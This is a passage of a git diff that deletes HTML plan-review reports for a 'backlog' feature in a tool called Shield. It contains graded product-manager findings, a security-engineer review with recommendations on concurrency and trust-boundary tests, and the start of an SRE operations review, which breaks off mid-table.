-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="product-manager--detailed-findings">Product Manager — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p>The PM persona is decomposed into 10 focused dimension subagents (PM1–PM10), each
-returning a single-check JSON result. They are rolled up here under the PM persona.</p>
-<p><strong>Persona grade: A</strong> — dim average = (4+4+4+4+3+4+4+4+4+2)/10 = <strong>3.7</strong> → A.</p>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th>Severity</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td>A</td>
-<td>Critical</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem-solution fit</td>
-<td>A</td>
-<td>Critical</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline (plan)</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td>B</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td>A</td>
-<td>Warning</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption &amp; rollout risk</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics</td>
-<td>A</td>
-<td>Important</td>
-</tr>
-<tr>
-<td>PM9</td>
-<td>Reversibility &amp; exit cost</td>
-<td>A</td>
-<td>Warning</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td><strong>C</strong></td>
-<td>Critical</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h3 id="pm1--user-impact-clarity--a-critical">PM1 — User impact clarity — A (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM1&quot;, &quot;name&quot;: &quot;User impact clarity&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;| P1 | Ashwini — Shield maintainer running `/research`/`/plan`/`/implement` daily | Capture future work without losing focus on the current task; come back later to an ordered list of what to pick up next | Future ideas get lost or derail the current task; no ordered \&quot;later\&quot; list at the project level |&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §4 names personas P1 (Ashwini) and P2 (the agent) with concrete goals and frictions; §7 quantifies impact via success metrics.</p>
-<h3 id="pm2--problem-solution-fit--a-critical">PM2 — Problem-solution fit — A (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM2&quot;, &quot;name&quot;: &quot;Problem-solution fit&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;Today there is **nowhere to park that work**. The options are bad: derail the current task to chase it, or drop it in a comment / memory / someone's head and lose it.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>Every capability maps one-to-one onto the stated problem (store → &quot;nowhere to park&quot;, capture → agent-discovered-work gap, ordered list → &quot;what next&quot;, promotion+reconciliation → &quot;loose idea to plan&quot;). Problem-first ordering holds; scope creep fenced in §6 non-goals.</p>
-<h3 id="pm3--scope-discipline-plan--a-important">PM3 — Scope discipline (plan) — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM3&quot;, &quot;name&quot;: &quot;Scope discipline (plan)&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Out of scope:\n- Per-feature backlogs; PM-tool sync of un-promoted entries; a rejected/dropped audit trail; cross-project backlogs; priority buckets; end-of-task surfacing hooks. (See PRD §6/§11.)&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>MVP-shaped: TRD §3 Out of scope, PRD §6/§11 non-goals with rationale, lean PRD omits 11 standard sections by design, staged milestones, §8 alternatives reject heavier designs (A3 lifecycle engine, A4 hook reconciliation).</p>
-<h3 id="pm4--prioritization-rationale--a-important">PM4 — Prioritization rationale — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM4&quot;, &quot;name&quot;: &quot;Prioritization rationale&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;**Staged safety:** M1 ships read/append + manual remove only; the destructive automatic reconciliation lands last (M3), so the risky path is introduced after the store is proven.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>Explicit <code>depends_on</code> chain M1→M2→M3, per-story priority labels, and a staged-safety sequencing rationale in TRD §14.</p>
-<h3 id="pm5--stakeholder-communicability--b-important">PM5 — Stakeholder communicability — B (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM5&quot;, &quot;name&quot;: &quot;Stakeholder communicability&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;B&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Future work surfaces constantly while using Shield — during `/research`, while writing a PRD, mid-`/plan`, and especially during `/implement` (\&quot;we should also handle X later\&quot;, \&quot;this whole area needs a rewrite\&quot;). Today there is **nowhere to park that work**.&quot;,
-  &quot;gap&quot;: &quot;The plain-language WHAT/WHY lives only in the PRD; the TRD §1 overview and plan.md (the artifacts a reviewer hits first) lead with Shield-internal filesystem and pipeline jargon (manifest.json, reconciliation, eager/lazy prune) without a reader-facing summary.&quot;,
-  &quot;suggestion&quot;: &quot;Add a two-to-three-sentence plain-language executive summary at the top of trd.md and plan.md that states what is being built and why before the schema- and pipeline-heavy detail.&quot;
-}
-</code></pre>
-<h3 id="pm6--market--competitive-awareness--a-warning">PM6 — Market / competitive awareness — A (Warning)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM6&quot;, &quot;name&quot;: &quot;Market / competitive awareness&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Warning&quot;,
-  &quot;evidence_quote&quot;: &quot;**A1. Stamp a `backlog_id` onto the promoted story in `plan.json`** (id-based reconciliation). Rejected: re-introduces a synthetic id and writes into `plan.json`; the feature(manifest)+epic(plan) match key reconciles with no stamping.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>TRD §8 names four alternatives (A1–A4) with rejection rationale; PRD §6/§11 positions vs the incumbent PM tool's own backlog and the do-nothing baseline.</p>
-<h3 id="pm7--adoption--rollout-risk--a-important">PM7 — Adoption &amp; rollout risk — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM7&quot;, &quot;name&quot;: &quot;Adoption &amp; rollout risk&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;Capture friction too high → nobody captures | Single-step capture; agent can capture without prompting | @ashwinimanoj&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §10 names behavioral-change risks with mitigations + owner; the load-bearing &quot;agents reliably surface follow-up work&quot; assumption is explicitly flagged unvalidated with a revisit trigger; §7 tracks capture-friction as a metric.</p>
-<h3 id="pm8--success-metrics--a-important">PM8 — Success metrics — A (Important)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM8&quot;, &quot;name&quot;: &quot;Success metrics&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Important&quot;,
-  &quot;evidence_quote&quot;: &quot;≥70% reach a terminal state (promoted/landed in a plan, or explicitly dropped) within 30 days; &lt;20% sit untouched &gt;60 days&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>PRD §7 has a quantified, time-bound metrics table (≥70%, &lt;20%, 100%, ≥60%) with counters and a stated manual/git-history measurement plan (TRD N6). Soft spot: &quot;capture friction&quot; is qualitative.</p>
-<h3 id="pm9--reversibility--exit-cost--a-warning">PM9 — Reversibility &amp; exit cost — A (Warning)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM9&quot;, &quot;name&quot;: &quot;Reversibility &amp; exit cost&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;A&quot;, &quot;severity&quot;: &quot;Warning&quot;,
-  &quot;evidence_quote&quot;: &quot;**Steps to undo:** `backlog.json` is git-tracked — `git revert` (or restore the file) recovers any wrongly-removed entry. The `/backlog` command is additive to the plugin; not invoking it is a complete disable.&quot;,
-  &quot;gap&quot;: null, &quot;suggestion&quot;: null
-}
-</code></pre>
-<p>TRD §14 assesses the exit ramp, staged risk profile, and a named fallback trigger; corroborated by §6 N4 and §9 schema_version migration.</p>
-<h3 id="pm10--business-value-alignment--c-critical">PM10 — Business value alignment — C (Critical)</h3>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;PM10&quot;, &quot;name&quot;: &quot;Business value alignment&quot;, &quot;persona&quot;: &quot;product-manager&quot;,
-  &quot;grade&quot;: &quot;C&quot;, &quot;severity&quot;: &quot;Critical&quot;,
-  &quot;evidence_quote&quot;: &quot;**(unvalidated)** The volume/loss of future-work items today is high enough to justify the tool — no baseline count has been measured; v1's own `backlog.json` history will validate it.&quot;,
-  &quot;gap&quot;: &quot;The tool's core justification is an operational-savings claim (avoiding lost future-work) that the docs themselves flag as unvalidated with no measured baseline, so the business value is asserted rather than evidenced.&quot;,
-  &quot;suggestion&quot;: &quot;Capture even a rough baseline — e.g. count lost/re-derived future-work items over a recent week of Shield usage from git history or chat logs — to ground the operational-savings claim before committing all four milestones.&quot;
-}
-</code></pre>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
deleted file mode 100644
index ed0a6fda..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/security-engineer.html
+++ /dev/null
@@ -1,176 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="security-engineer--detailed-findings">Security Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="security-engineer-review-grade-b">Security Engineer Review (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>SE1</td>
-<td>Threat model coverage</td>
-<td>B</td>
-<td>Concrete threats are named and mitigated: concurrent-write corruption (N1), wrong removal / epic-name collision (PRD §10 risk table, TRD §14 trigger), read-contract drift (N3). Adversary model is implicit (&quot;single actor, no network&quot;), which is reasonable for the asset, but there's no explicit enumeration of the <em>agent-as-actor</em> threat: an <code>source=agent</code> writer is a semi-trusted automated actor that can inject entries unattended. No threat for malicious/garbage content reaching downstream <code>/plan</code>/<code>/implement</code> via the transient promotion reference.</td>
-</tr>
-<tr>
-<td>SE2</td>
-<td>Least-privilege design</td>
-<td>B+</td>
-<td>Genuinely good for the scope. Promotion deliberately does NOT stamp ids into <code>plan.json</code> (F6/EPIC-3-S1) — minimizes write surface into the trusted artifact. Reconciliation is read-only against <code>manifest.json</code>/<code>plan.json</code> and only writes <code>backlog.json</code>. Removal is gated (never-remove-on-doubt). The only write privilege is to one file.</td>
-</tr>
-<tr>
-<td>SE3</td>
-<td>Data protection</td>
-<td>A−</td>
-<td>Strong for local tooling. N4 makes removal recoverable via <code>git revert</code>; N1 protects integrity; atomic temp-then-rename prevents partial writes. The one gap: &quot;plain delete, no retained history&quot; (F5/EPIC-1-S4) means manual remove of an <em>uncommitted</em> entry that was never git-committed is unrecoverable — N4's recoverability claim only holds for entries that reached a commit. Not called out.</td>
-</tr>
-<tr>
-<td>SE4</td>
-<td>Secrets management</td>
-<td>A</td>
-<td>Correctly scoped: TRD §9 &quot;Secrets/auth: none — local file, no network, single actor.&quot; <code>backlog.json</code> holds work-item text only. No secret storage surface exists. The risk worth one line — free-text capture could <em>accidentally</em> contain a pasted secret that then lands in git history — is not mentioned, but it's a Warning at most.</td>
-</tr>
-<tr>
-<td>SE5</td>
-<td>Network security</td>
-<td>A</td>
-<td>Genuinely out of scope and correctly claimed. No network surface; not penalized per instructions.</td>
-</tr>
-<tr>
-<td>SE6</td>
-<td>Access control</td>
-<td>B</td>
-<td>Single-actor claim is justified for a local dev file. But &quot;access control&quot; here maps to the <strong>agent-vs-user write distinction</strong>, which the plan <em>models</em> (<code>source ∈ {user, agent}</code>) but does not <em>enforce or use as a trust signal</em> — an agent-captured entry is treated identically to a user one at promotion/reconciliation. That's acceptable for v1 but the <code>source</code> field's security purpose (provenance/audit) is undefined.</td>
-</tr>
-<tr>
-<td>SE7</td>
-<td>Compliance requirements</td>
-<td>A</td>
-<td>N5 makes the explicit data-classification claim: internal, non-PII developer work-item text, same trust boundary as <code>plan.json</code>/<code>manifest.json</code>. The claim is justified — the data co-locates with and is no more sensitive than artifacts already in the repo. No regulated data, no compliance regime applies. Well-reasoned, not hand-waved.</td>
-</tr>
-<tr>
-<td>SE8</td>
-<td>Incident response</td>
-<td>B</td>
-<td>TRD §14 has a real rollback/containment story: staged rollout (destructive reconciliation lands last, M3), an explicit <em>trigger</em> (&quot;if eager prune produces a wrong removal git revert can't cheaply recover → disable eager prune, fall back to manual-remove-only&quot;), and a kill switch (not invoking <code>/backlog</code> = full disable). Detection is the weak spot: a wrong removal is detected only by a human noticing a missing entry — N3 logs warnings on drift but nothing alerts on an actual erroneous removal.</td>
-</tr>
-<tr>
-<td>SE9</td>
-<td>Acceptance criteria quality</td>
-<td>B+</td>
-<td>ACs are largely specific and testable. Strong examples: &quot;killing capture mid-write leaves no corrupted backlog.json (only a .tmp may remain)&quot; (EPIC-1-S2), &quot;prd-only feature is NOT removed&quot; (EPIC-3-S2), &quot;second pass is a no-op (idempotent)&quot; (EPIC-3-S3), named validator errors. Gaps: N1's central race (&quot;concurrent capture racing reconciliation&quot;) has no AC that actually <em>exercises concurrency</em> — the mid-write-kill AC tests crash-atomicity, not the two-writer race the NFR claims to defend. &quot;Validate-or-refuse on read&quot; has no AC proving a malformed file is <em>refused</em> rather than silently read.</td>
-</tr>
-<tr>
-<td>SE10</td>
-<td>Edge case &amp; rollback coverage</td>
-<td>A−</td>
-<td>Best-covered area. Edge cases enumerated and turned into fixtures (EPIC-4-S1): prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays. Never-remove-on-doubt is the safety default. Rollback is git-revert + staged introduction + documented fallback trigger (§14). Missing edges: the <code>.tmp</code> cleanup (&quot;cleaned on next run&quot;) has no failure-mode coverage if cleanup itself fails; epic-name <em>collision across two features</em> is mentioned as a risk but no fixture asserts it stays.</td>
-</tr>
-<tr>
-<td>SE11</td>
-<td>Integration test strategy</td>
-<td>B</td>
-<td>EPIC-4 evals are self-contained, no-LLM, CI-wired, and cover the cross-file contract (backlog.json × manifest.json × plan.json) — good. But the <em>eager-prune integration point</em> (end of a real <code>/plan</code> / <code>/implement</code> run) is the highest-risk wiring and the eval covers it via fixtures, not via an actual command run. The read-contract coupling to upstream schemas (§11) is acknowledged but there's no contract test that <em>fails</em> when manifest/plan schema drifts.</td>
-</tr>
-<tr>
-<td>SE12</td>
-<td>Regression risk assessment</td>
-<td>A−</td>
-<td>Blast radius is well-bounded and stated: the only destructive behavior is entry removal (§14); <code>/backlog</code> is additive to the plugin; promotion is read-only against <code>plan.json</code> (no stamping → no regression to existing planning). Staged M1→M3 sequencing puts the risky reconciliation last behind a proven store. The unaddressed regression: eager-prune hooks <em>into</em> <code>/plan</code> and <code>/implement</code> — a bug there could affect those commands' exit behavior, and that blast radius isn't explicitly assessed.</td>
-</tr>
-<tr>
-<td>SE13</td>
-<td>Environment validation plan</td>
-<td>C</td>
-<td>Weakest point. No dev/staging/prod distinction (reasonable — it's local tooling), but there's also no smoke-test or first-run validation plan: how does a maintainer verify reconciliation is behaving correctly against their <em>real</em> <code>backlog.json</code> before trusting auto-removal? §14 mentions a fallback but not a &quot;validate before enabling eager prune&quot; canary step. The N2 performance budget (~1s, ≤50 features/200 entries) has no validation method attached.</td>
-</tr>
-<tr>
-<td>SE14</td>
-<td>Security validation</td>
-<td>B−</td>
-<td>The security-relevant behaviors that DO get validated: atomicity (crash test), never-remove-on-doubt (fixtures), validator rejection of bad enums. Missing: no test asserting the <strong>validate-or-refuse refusal path</strong> actually refuses (only that crash leaves no corruption); no concurrency stress test for the N1 race; no negative test that promotion does NOT write to <code>plan.json</code> (F6 is the key trust-boundary guarantee and has an AC but no eval listed in EPIC-4-S1's coverage list).</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan's core integrity and safety design is strong and well-reasoned for its scope (atomic write, never-remove-on-doubt, git-revert recoverability, staged rollout), and the N5 trust-boundary/classification claim is justified — but the N1 concurrency guarantee and the F6 no-stamping trust boundary are asserted without a test that actually exercises them, so the two most security-load-bearing claims are currently unverifiable.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>SE9 / SE14</td>
-<td>Add an eval that exercises the <strong>actual N1 race</strong>, not just crash-atomicity: spawn a concurrent capture and a reconciliation write against the same <code>backlog.json</code> and assert no corruption and no lost entry. The mid-write-kill AC tests a different failure mode than the &quot;capture racing reconciliation&quot; the NFR claims to defend. Without it, N1 is an unverified assertion.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE14</td>
-<td>Add a negative eval to EPIC-4-S1's coverage list asserting that promotion via <code>/plan</code>/<code>/implement</code> leaves <code>plan.json</code> and story records <strong>byte-unchanged</strong> (no id stamping). F6 is the load-bearing trust-boundary guarantee; it has an AC but is absent from the listed eval coverage.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE9</td>
-<td>Add an explicit AC (EPIC-1-S2) that a <strong>malformed/partial <code>backlog.json</code> on read is refused with a named error</strong>, not silently read or truncated. &quot;Validate-or-refuse on read&quot; is stated in F2/N1 but no AC proves the refusal path.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE13</td>
-<td>Add a first-run / canary validation step before auto-removal is trusted: e.g. a <code>--dry-run</code> reconciliation mode that reports what <em>would</em> be removed, so a maintainer validates against their real backlog before enabling eager prune. Pairs naturally with the §14 fallback.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE10 / SE14</td>
-<td>Add a fixture for <strong>epic-name collision across two different features</strong> (PRD §10 names it as a risk; §14 names it as the rollback trigger) asserting the entry stays. The proposed-new match-by-name path is the one place a wrong removal is plausible; it deserves a dedicated negative test.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1 / SE6</td>
-<td>Define the security purpose of the <code>source ∈ {user, agent}</code> field. Either state it is provenance/audit-only (and that agent and user entries are equally trusted at reconciliation), or use it. Right now an unattended <code>source=agent</code> writer is a semi-trusted actor with no distinct handling, and the threat model doesn't address agent-injected entries flowing into <code>/plan</code> via the transient reference.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE3</td>
-<td>Note in N4/EPIC-1-S4 that git-revert recoverability only covers entries that reached a commit; a manual remove of an uncommitted entry is unrecoverable by design. Small doc fix that aligns the recoverability claim with the &quot;plain delete, no history&quot; decision.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point average ≈ 3.05 → B). The plan is security-sound for local single-actor tooling with a justified trust-boundary/classification claim and genuinely good integrity/rollback design; it falls short of A because its two most security-critical guarantees (N1 concurrency, F6 no-stamping) lack tests that exercise them, and environment/first-run validation (SE13) is thin.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
deleted file mode 100644
index ff0f8f27..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/detailed/sre.html
+++ /dev/null
@@ -1,129 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="sre--detailed-findings">SRE — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="operations-review--plan-grade-b">Operations Review — Plan (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>B</td>
-<td>N6 explicitly chooses no telemetry in v1; observability = the <strong>logged warning on doubt</strong> (N3, EPIC-3-S2) plus git history of <code>backlog.json</code> (N4) as the audit trail. Removals are auditable via git commits. Two real gaps: (a) the <em>positive</em> removal path (eager prune / lazy sweep actually removing an entry) is never specified to log <em>what</em> it removed and <em>why</em> it matched — only the doubt path logs. A wrong-but-confident removal leaves no breadcrumb except a git diff with no rationale. (b) No log destination/format defined (stdout? a log file? structured?). For a 3am &quot;why did my entry vanish&quot; investigation, git-revert recovers the data but not the reasoning.</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>C</td>
-<td>Appropriately translated: there's no daemon to alert on, and §7 success metrics define a <strong>manual <code>/backlog</code> audit</strong> cadence as the &quot;health check.&quot; But thresholds that should trigger action are named in the PRD (≥70% reach terminal state, &lt;20% untouched &gt;60d, ≥60% suggestion-acceptance) with <strong>no defined owner cadence or trigger</strong> beyond &quot;periodic&quot; — nobody is told <em>when</em> to audit or <em>what reading</em> means &quot;intervene.&quot; The N2 ~1s budget (the one real performance signal) has a defined breach action (Q1, revisit epic index) which is good, but no way to <em>measure</em> latency is specified — the budget is unmonitorable as written.</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>A</td>
-<td>Strongest area. The destructive path (reconciliation removal) is analyzed thoroughly: wrong/over-broad removal via epic-name collision (Risk table + §14 trigger), never-remove-on-doubt as the default-safe stance (F7, N3, EPIC-3-S2), concurrent-write corruption (N1, atomic temp-then-rename + validate-or-refuse), crash-mid-write leaving at most a <code>.tmp</code> (N1), malformed/old upstream shapes degrading to entry-stays not exception (N3). Cascading-failure analog (a manifest/plan shape change silently breaking reconciliation) is named as read-contract coupling (§9, §11) with a &quot;flag this consumer&quot; note. Recovery time is implicit (git revert) but the failure enumeration is excellent.</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B</td>
-<td>RPO/RTO analog handled by N4: <code>backlog.json</code> is git-tracked, so any wrong removal is recoverable via <code>git revert</code> — RPO = last commit, recovery is a documented one-liner. §14 adds a real fallback (disable eager prune, fall back to manual-remove-only). Gap: recovery assumes the file is <strong>committed</strong> — there is no statement about <em>when</em> <code>backlog.json</code> gets committed. If capture/removal happen between commits, an uncommitted wrong-removal during a working session is <strong>not</strong> recoverable by git revert (it'd need reflog/stash luck, and the eager prune fires automatically at end-of-run, possibly before any commit). The restore procedure is named but never tested/rehearsed (no eval asserts &quot;revert restores a wrongly-pruned entry&quot;).</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>B</td>
-<td>Directly addressed and well-scoped for a local tool. N2 sets a concrete budget (~1s at ≤~50 features / ~200 entries) with a smart optimization already baked in (open only <code>plan.json</code> files the manifest flags as having a plan, not all of them). The scaling trigger and manual-intervention path are explicit: Q1 + N2 say &quot;above that scale, revisit a project-level epic index,&quot; resolved data-driven post-M3. Gap: as noted in OP2, the budget has <strong>no measurement mechanism</strong> — &quot;revisit if breached&quot; is unfalsifiable without timing instrumentation, and the breach is something a human would only notice as &quot;feels slow.&quot; The N2 numbers are also asserted, not derived from Q2's still-unmeasured volume baseline.</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>A</td>
-<td>The staged rollout is the standout operational decision: M1 ships read/append + manual-remove only; the <strong>destructive automatic reconciliation lands last in M3</strong>, deliberately so the risky path is introduced after the store is proven (§14, milestone deps M1→M2→M3). This is the file-tool equivalent of a canary — the blast-radius feature is gated behind two proven milestones. Rollback trigger is explicit (§14). &quot;Not invoking <code>/backlog</code> is a complete disable&quot; is a clean feature-flag analog. Eval gate (EPIC-4-S1) with RED→GREEN before release is a real merge gate. Minor: no per-trigger kill switch granularity beyond &quot;disable eager prune&quot; (lazy sweep on view has no independent off-switch documented).</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>C</td>
